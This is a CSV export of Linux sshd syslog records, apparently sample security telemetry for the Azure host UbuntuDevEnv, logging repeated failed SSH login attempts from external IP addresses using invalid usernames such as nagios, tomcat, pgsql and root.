+11406,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:25:48,UbuntuDevEnv,2019-06-26 00:25:48,auth,UbuntuDevEnv,info,Failed password for invalid user nagios from 104.248.121.67 port 38208 ssh2,72497,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,104.248.121.6,38208,,
+11407,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:25:48,UbuntuDevEnv,2019-06-26 00:25:48,auth,UbuntuDevEnv,info,Disconnected from invalid user nagios 104.248.121.67 port 38208 [preauth],72497,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,104.248.121.6,38208,,
+11408,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:25:48,UbuntuDevEnv,2019-06-26 00:25:48,auth,UbuntuDevEnv,info,Received disconnect from 104.248.121.67 port 38208:11: Bye Bye [preauth],72497,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.248.121.6,38208,,
+11409,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:25:56,UbuntuDevEnv,2019-06-26 00:25:56,auth,UbuntuDevEnv,info,Invalid user english from 118.222.146.186 port 60724,72530,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,english,118.222.146.1,60724,,
+11410,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:25:56,UbuntuDevEnv,2019-06-26 00:25:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.222.146.186,72530,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.222.146.1,,0,
+11411,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:25:56,UbuntuDevEnv,2019-06-26 00:25:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,72530,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11412,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:25:58,UbuntuDevEnv,2019-06-26 00:25:58,auth,UbuntuDevEnv,info,Failed password for invalid user english from 118.222.146.186 port 60724 ssh2,72530,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,english,118.222.146.1,60724,,
+11413,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:25:59,UbuntuDevEnv,2019-06-26 00:25:58,auth,UbuntuDevEnv,info,Received disconnect from 118.222.146.186 port 60724:11: Bye Bye [preauth],72530,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.222.146.1,60724,,
+11414,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:25:59,UbuntuDevEnv,2019-06-26 00:25:58,auth,UbuntuDevEnv,info,Disconnected from invalid user english 118.222.146.186 port 60724 [preauth],72530,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,english,118.222.146.1,60724,,
+11415,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:26:19,UbuntuDevEnv,2019-06-26 00:26:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=186.31.116.78  user=root,72605,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,186.31.116.7,,0,
+11416,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:26:20,UbuntuDevEnv,2019-06-26 00:26:20,auth,UbuntuDevEnv,info,Failed password for root from 186.31.116.78 port 45666 ssh2,72605,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,186.31.116.7,45666,,
+11417,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:26:20,UbuntuDevEnv,2019-06-26 00:26:20,auth,UbuntuDevEnv,info,Received disconnect from 186.31.116.78 port 45666:11: Bye Bye [preauth],72605,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,186.31.116.7,45666,,
+11418,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:26:20,UbuntuDevEnv,2019-06-26 00:26:20,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 186.31.116.78 port 45666 [preauth],72605,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,186.31.116.7,45666,,
+11419,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:26:38,UbuntuDevEnv,2019-06-26 00:26:38,auth,UbuntuDevEnv,info,Invalid user chemin from 131.100.219.3 port 37698,72673,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chemin,131.100.219.3,37698,,
+11420,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:26:38,UbuntuDevEnv,2019-06-26 00:26:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,72673,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11421,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:26:38,UbuntuDevEnv,2019-06-26 00:26:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.100.219.3,72673,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.100.219.3,,0,
+11422,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:26:41,UbuntuDevEnv,2019-06-26 00:26:40,auth,UbuntuDevEnv,info,Failed password for invalid user chemin from 131.100.219.3 port 37698 ssh2,72673,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chemin,131.100.219.3,37698,,
+11423,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:26:42,UbuntuDevEnv,2019-06-26 00:26:41,auth,UbuntuDevEnv,info,Disconnected from invalid user chemin 131.100.219.3 port 37698 [preauth],72673,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chemin,131.100.219.3,37698,,
+11424,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:26:42,UbuntuDevEnv,2019-06-26 00:26:41,auth,UbuntuDevEnv,info,Received disconnect from 131.100.219.3 port 37698:11: Bye Bye [preauth],72673,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.100.219.3,37698,,
+11425,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:26:55,UbuntuDevEnv,2019-06-26 00:26:55,auth,UbuntuDevEnv,info,Invalid user tomcat from 88.247.110.88 port 55368,72746,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tomcat,88.247.110.8,55368,,
+11426,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:26:55,UbuntuDevEnv,2019-06-26 00:26:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,72746,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11427,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:26:55,UbuntuDevEnv,2019-06-26 00:26:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=88.247.110.88,72746,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,88.247.110.8,,0,
+11428,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:26:58,UbuntuDevEnv,2019-06-26 00:26:57,auth,UbuntuDevEnv,info,Failed password for invalid user tomcat from 88.247.110.88 port 55368 ssh2,72746,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tomcat,88.247.110.8,55368,,
+11429,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:26:58,UbuntuDevEnv,2019-06-26 00:26:57,auth,UbuntuDevEnv,info,Disconnected from invalid user tomcat 88.247.110.88 port 55368 [preauth],72746,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tomcat,88.247.110.8,55368,,
+11430,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:26:58,UbuntuDevEnv,2019-06-26 00:26:57,auth,UbuntuDevEnv,info,Received disconnect from 88.247.110.88 port 55368:11: Bye Bye [preauth],72746,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,88.247.110.8,55368,,
+11431,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:27:13,UbuntuDevEnv,2019-06-26 00:27:12,auth,UbuntuDevEnv,info,Invalid user pgsql from 104.248.121.67 port 46649,72807,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pgsql,104.248.121.6,46649,,
+11432,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:27:13,UbuntuDevEnv,2019-06-26 00:27:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,72807,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11433,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:27:13,UbuntuDevEnv,2019-06-26 00:27:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.121.67,72807,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.248.121.6,,0,
+11434,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:27:14,UbuntuDevEnv,2019-06-26 00:27:14,auth,UbuntuDevEnv,info,Failed password for invalid user pgsql from 104.248.121.67 port 46649 ssh2,72807,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pgsql,104.248.121.6,46649,,
+11435,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:27:14,UbuntuDevEnv,2019-06-26 00:27:14,auth,UbuntuDevEnv,info,Received disconnect from 104.248.121.67 port 46649:11: Bye Bye [preauth],72807,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.248.121.6,46649,,
+11436,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:27:14,UbuntuDevEnv,2019-06-26 00:27:14,auth,UbuntuDevEnv,info,Disconnected from invalid user pgsql 104.248.121.67 port 46649 [preauth],72807,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pgsql,104.248.121.6,46649,,
+11437,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:27:26,UbuntuDevEnv,2019-06-26 00:27:26,auth,UbuntuDevEnv,info,Invalid user mta from 114.112.81.180 port 43588,72855,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mta,114.112.81.1,43588,,
+11438,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:27:26,UbuntuDevEnv,2019-06-26 00:27:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=114.112.81.180,72855,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,114.112.81.1,,0,
+11439,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:27:26,UbuntuDevEnv,2019-06-26 00:27:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,72855,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11440,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:27:28,UbuntuDevEnv,2019-06-26 00:27:27,auth,UbuntuDevEnv,info,Failed password for invalid user mta from 114.112.81.180 port 43588 ssh2,72855,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mta,114.112.81.1,43588,,
+11441,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:27:28,UbuntuDevEnv,2019-06-26 00:27:28,auth,UbuntuDevEnv,info,Disconnected from invalid user mta 114.112.81.180 port 43588 [preauth],72855,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mta,114.112.81.1,43588,,
+11442,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:27:28,UbuntuDevEnv,2019-06-26 00:27:28,auth,UbuntuDevEnv,info,Received disconnect from 114.112.81.180 port 43588:11: Bye Bye [preauth],72855,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,114.112.81.1,43588,,
+11443,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:27:37,UbuntuDevEnv,2019-06-26 00:27:37,auth,UbuntuDevEnv,info,Invalid user bukkit from 118.222.146.186 port 49254,72891,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bukkit,118.222.146.1,49254,,
+11444,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:27:37,UbuntuDevEnv,2019-06-26 00:27:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,72891,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11445,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:27:37,UbuntuDevEnv,2019-06-26 00:27:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.222.146.186,72891,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.222.146.1,,0,
+11446,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:27:40,UbuntuDevEnv,2019-06-26 00:27:39,auth,UbuntuDevEnv,info,Failed password for invalid user bukkit from 118.222.146.186 port 49254 ssh2,72891,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bukkit,118.222.146.1,49254,,
+11447,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:27:40,UbuntuDevEnv,2019-06-26 00:27:39,auth,UbuntuDevEnv,info,Disconnected from invalid user bukkit 118.222.146.186 port 49254 [preauth],72891,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bukkit,118.222.146.1,49254,,
+11448,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:27:40,UbuntuDevEnv,2019-06-26 00:27:39,auth,UbuntuDevEnv,info,Received disconnect from 118.222.146.186 port 49254:11: Bye Bye [preauth],72891,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.222.146.1,49254,,
+11449,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:28:15,UbuntuDevEnv,2019-06-26 00:28:14,auth,UbuntuDevEnv,info,Invalid user ts3 from 186.31.116.78 port 54471,73024,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,186.31.116.7,54471,,
+11450,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:28:15,UbuntuDevEnv,2019-06-26 00:28:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=186.31.116.78,73024,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,186.31.116.7,,0,
+11451,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:28:15,UbuntuDevEnv,2019-06-26 00:28:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,73024,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11452,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:28:17,UbuntuDevEnv,2019-06-26 00:28:16,auth,UbuntuDevEnv,info,Failed password for invalid user ts3 from 186.31.116.78 port 54471 ssh2,73024,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,186.31.116.7,54471,,
+11453,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:28:17,UbuntuDevEnv,2019-06-26 00:28:17,auth,UbuntuDevEnv,info,Disconnected from invalid user ts3 186.31.116.78 port 54471 [preauth],73024,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,186.31.116.7,54471,,
+11454,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:28:17,UbuntuDevEnv,2019-06-26 00:28:17,auth,UbuntuDevEnv,info,Received disconnect from 186.31.116.78 port 54471:11: Bye Bye [preauth],73024,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,186.31.116.7,54471,,
+11455,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:28:30,UbuntuDevEnv,2019-06-26 00:28:29,auth,UbuntuDevEnv,info,Invalid user mtm from 88.247.110.88 port 64612,73082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mtm,88.247.110.8,64612,,
+11456,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:28:30,UbuntuDevEnv,2019-06-26 00:28:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,73082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11457,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:28:30,UbuntuDevEnv,2019-06-26 00:28:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=88.247.110.88,73082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,88.247.110.8,,0,
+11458,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:28:32,UbuntuDevEnv,2019-06-26 00:28:31,auth,UbuntuDevEnv,info,Failed password for invalid user mtm from 88.247.110.88 port 64612 ssh2,73082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mtm,88.247.110.8,64612,,
+11459,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:28:32,UbuntuDevEnv,2019-06-26 00:28:32,auth,UbuntuDevEnv,info,Received disconnect from 88.247.110.88 port 64612:11: Bye Bye [preauth],73082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,88.247.110.8,64612,,
+11460,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:28:32,UbuntuDevEnv,2019-06-26 00:28:32,auth,UbuntuDevEnv,info,Disconnected from invalid user mtm 88.247.110.88 port 64612 [preauth],73082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mtm,88.247.110.8,64612,,
+11461,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:28:38,UbuntuDevEnv,2019-06-26 00:28:38,auth,UbuntuDevEnv,info,Invalid user come from 104.248.121.67 port 55087,73115,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,come,104.248.121.6,55087,,
+11462,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:28:38,UbuntuDevEnv,2019-06-26 00:28:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.121.67,73115,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.248.121.6,,0,
+11463,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:28:38,UbuntuDevEnv,2019-06-26 00:28:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,73115,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11464,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:28:41,UbuntuDevEnv,2019-06-26 00:28:40,auth,UbuntuDevEnv,info,Failed password for invalid user come from 104.248.121.67 port 55087 ssh2,73115,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,come,104.248.121.6,55087,,
+11465,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:28:41,UbuntuDevEnv,2019-06-26 00:28:41,auth,UbuntuDevEnv,info,Disconnected from invalid user come 104.248.121.67 port 55087 [preauth],73115,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,come,104.248.121.6,55087,,
